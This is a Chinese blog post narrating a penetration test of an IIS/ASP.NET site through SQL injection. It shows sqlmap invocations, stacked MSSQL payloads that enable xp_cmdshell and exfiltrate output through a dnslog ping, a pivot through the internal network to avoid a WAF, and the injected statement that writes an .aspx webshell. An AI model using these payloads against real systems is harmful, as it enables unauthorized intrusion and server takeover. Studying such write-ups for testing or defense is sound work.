首页 > 其他分享 >渗透实录-02

渗透实录-02

时间:2022-12-22 20:12:40浏览次数:37  
标签:02 cmdshell EXEC 渗透 xxx 实录 -- xp 权限

记录一次实战稍曲折拿下目标站点的过程。

前期摸点

IIS7.0+ASP.NET的组合,简单尝试发现前台登录页面可能存在SQL注入,数据包如下:

为了节约时间直接祭出sqlmap,-r x.txt -v 3 --random-agent --dbms=mssql --batch

识别出了数据库,却被不明力量拦截了。

手工尝试绕过不明力量,堆叠的方式利用xp_cmdshell尝试将命令回显从dnslog中带出来:

先开xp_cmdshell:EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE

利用dnslog带出回显:EXEC master..xp_cmdshell 'ping xxx.dnslog.cn -n 2'

一顿操作过后发现dnslog没反应,这里可能有几个原因,第一就是被不明力量拦截了,第二是目标不出网,第三可能我们语句构造有问题。是第一个原因的可能性比较大。

曲线救国

放弃注入后,还测试了其他漏洞,都以失败告终。但是目标是一个单位的子域而已,可以从单位的其他站点入手,进入内网后再尝试MS17010、pth等等手段来拿到目标机器权限即可。

于是在历经九九八十一难后,我们终于在目标所属B段中拿到一台机器权限,并使用代理成功进入内网。

遗憾的是拿到的机器是linux服务器,并且内网MS17010都已经打了补丁,fscan扫出来的结果基本无用。如果我们继续拿内网机器权限再利用hash传递攻击尝试的话,且不说密码是否通杀,就时间上也会浪费不少,于是陷入了小小的尴尬境地。

不过我们随即转念一想,大多数的不明力量都会部署在dmz或者在最外层交换机之上,而目前我们在内网中是不是不会受到不明力量影响?思路到此立即掏出sqlmap,再次-r x.txt -v 3 --random-agent --dbms=mssql --batch

果然如我们所想,成功注出来了,先看一下权限:

dba权限,直接os-shell,采用的是堆叠+延时的注入,一个whoami等了将近10分钟的时间,太慢了,还是手注吧。

从whoami的回显得知系统权限为低权限,加用户肯定是行不通了,站库没有分离,直接写个webshell。路径的话在报错的数据包就可以找到,值得注意的是,这里权限是普通用户权限,所以写webshell最好选择上传的目录或图片路径,本人尝试写入根路径浪费了一些时间。

上语句:
%';EXEC xp_cmdshell 'echo "xxx" > D:\xxx\xxx\xxx.aspx' -- -

成功getshell,最后用土豆提权收个尾,战斗结束。

标签:02,cmdshell,EXEC,渗透,xxx,实录,--,xp,权限
From: https://www.cnblogs.com/cHr1s/p/16999489.html

相关文章

  • HTML-学习表单-2022-12-22
    <!DOCTYPEhtml><htmllang="en"><head><metacharset="UTF-8"><title>登录注册</title></head><body><h1>注册</h1><!--表单formaction提交的位置,可以是网站,......
  • NOIP2022游记
    当时考完记错了一个地方,真的以为自己退役了,哭到不能自已,感谢上帝,感谢OI,感谢自己再给自己一个追逐梦想的机会。Day-1离开考还有两天的晚上,宿舍在讨论奇奇怪怪的话题,内容......
  • 2022年度总结
    生活  2022年是结婚的第一年,今年是失业的第一年,今年是痛苦与快乐的事情并存的一年,今年是迎接新生命的一年。工作  2022年是公司突然倒闭的一年,在今年八月份开始,突然......
  • 创新趋势|自动驾驶出租车(Robotaxi)商业化2023年趋势展望
    本文着眼识别自动驾驶出租车(Robotaxi)商业化的核心内涵,定义商业化不同发展阶段的模式特点、能力要素和关键任务。结合中国式发展路径在生态打造和落地模式的演变提出见解......
  • 盘点2022年电视行业:科技与美学的战场三星缔造“生活方式”的全新价值
    作者|曾响铃文|响铃说前不久,中国质量协会第十一次组织开展了本年度电视行业用户满意度监测,监测对象为市场占有率达90%以上的10个主流电视品牌,结果显示2022年电视行业用......
  • 【python爬虫课程设计】2022-23赛季欧洲冠军联赛——绘制球员数据柱状图和词云
    一、选题的背景1.背景:2022-23赛季欧洲冠军联赛(2022–23UEFAChampionsLeague)由欧洲足球联合会主办的第68届欧洲足球俱乐部的顶级赛事,也是以欧洲冠军联赛名义下的第31届......
  • typescript02_声明变量
    //声明一个变量a同时声明他的类型为numberleta:number//a的类型生命为number,在以后的使用过程中a只能是数字a=1//a='hello'此行代码会报错,因为a的类型是number不能......
  • vue-cli · Failed to download repo vuejs-templates/webpack: connect ETIMEDOUT 39
    1.查看vue、node、webpack是否安装  2.vue安装 2.1安装cnpmnpminstall-gcnpm--registry=http://registry.npm.taobao.org 2.2安装vuecnpminstall-g@v......
  • 创新指南|2023年企业战略制定应避免的5大误区
    在迅速发展、不断变化的当下,尤其是疫情黑天鹅发生之后,许多企业面临着高度的不确定性,从而亟需进行企业战略的思考。在本文中,战略专家StephenBungay指出了五个战略误区,并......
  • 2022.12.22 动态规划练习
    依旧是被题目折磨的一天,能想出状态表示,但是在状态计算时不太会想。P1040[NOIP2003提高组]加分二叉树题目描述设一个\(n\)个节点的二叉树\(\text{tree}\)的中序遍......